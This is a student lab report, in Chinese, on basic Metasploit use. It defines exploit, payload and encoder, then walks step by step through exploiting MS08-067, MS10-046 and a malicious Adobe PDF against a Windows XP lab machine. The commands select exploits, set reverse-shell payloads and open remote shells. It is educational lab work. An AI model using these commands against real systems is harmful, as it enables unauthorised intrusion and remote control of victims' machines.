天天看點

20145239杜文超《網絡攻防》- MSF基礎應用20145239杜文超《網絡攻防》- MSF基礎應用

20145239杜文超《網絡攻防》- MSF基礎應用

基礎問題回答

1、用自己的話解釋什麼是exploit,payload,encode?

  • exploit:實作攻擊行為的主體,但沒有載荷隻是一個空殼。沒有子彈的槍是很好的比喻。
  • payload:載荷。一般指shellcode,攻擊成功後需要運作的東西。
  • encode:編碼器。使得我們的攻擊中不會出現“壞字元”,也可以通過編碼改變特征碼,實作免殺。

實驗總結與體會

msf僅僅是一個攻擊平台,攻擊具體的實作還是要靠抓住靶機上的漏洞進行。本次實驗我對metasploit的體系結構有了初步的認識。尤其是對6個主要子產品的功能和用途有了深入了解和實踐經驗。我也深刻的認識到在現實中想要真正攻陷一台靶機還是有難度的,因為本次實驗我使用的靶機是win xp sp3英文版系統。很老,應該算是被淘汰的了,是以才會有那麼多漏洞讓我可以抓住去攻擊,現在windows版本不斷更新,漏洞更新檔的更新速度也越來越快,是以更展現出了0 day漏洞的價值。

實驗過程

實驗環境配置

攻擊機:Kali(IP:192.168.248.128)

靶機:Windows XP SP3(IP:192.168.248.129)

MS08_067漏洞滲透攻擊

1、先用search ms08_067指令查詢該攻擊子產品。

2、輸入use exploit/windows/smb/ms08_067_netapi使用該子產品,并用show payloads指令檢視一下要用的payload。

3、輸入set payload generic/shell_reverse_tcp設定一下payload,通過反向連接配接擷取shell。

4、使用show options指令檢視需要進行的配置。

5、如圖所示進行配置,設定RHOST為遠端靶機IP位址、LHOST為主機IP位址。

6、設定完成後再次确認剛才的設定。

7、輸入exploit發起攻擊。

8、攻擊成功,成功擷取靶機系統shell。

對浏覽器攻擊:ms10_046漏洞攻擊

1、先利用search ms10_046指令檢視可以運用的攻擊子產品.

2、使用該漏洞進行攻擊。

3、設定相關參數。SRVHOST是本地監聽主機的IP位址,LHOST是監聽的IP位址,都填攻擊者本機IP位址。

4、發起攻擊,可以看到,生成了url連結位址。

5、我們使用靶機的IE浏覽器登陸一下剛才生成的url位址。

6、發現主機這邊已經攻擊成功了。

7、使用指令sessions -i 1開始連接配接,成功得到shell。

對Adobe的漏洞攻擊:adobe_pdf_embedded_exe

1、進入檔案攻擊目錄選擇一個合适的adobe漏洞。

2、我選擇的是adobe_pdf_embedded_exe,use這個漏洞。

3、設定一下payload攻擊有效載荷:set payload windows/meterpreter/reverse_tcp

4、show options檢視需要進行哪些配置。

5、設定檔案名稱5239.pdf,LHOST為攻擊者主機IP。

6、再次使用show options檢查配置。

7、發起攻擊。發現生成了一個名為5239的pdf檔案。

8、把攻擊主機設定為監聽狀态,方法和以前的實驗類似。

9、将該pdf拷貝到靶機上然後打開。

10、攻擊機已經成功擷取到靶機shell。

輔助子產品的應用:scanner/http/dir_listing

1、先用search了解一下有關scanner/http/dir_listing的相關資訊。

2、設定相關參數。

3、run,運作成功。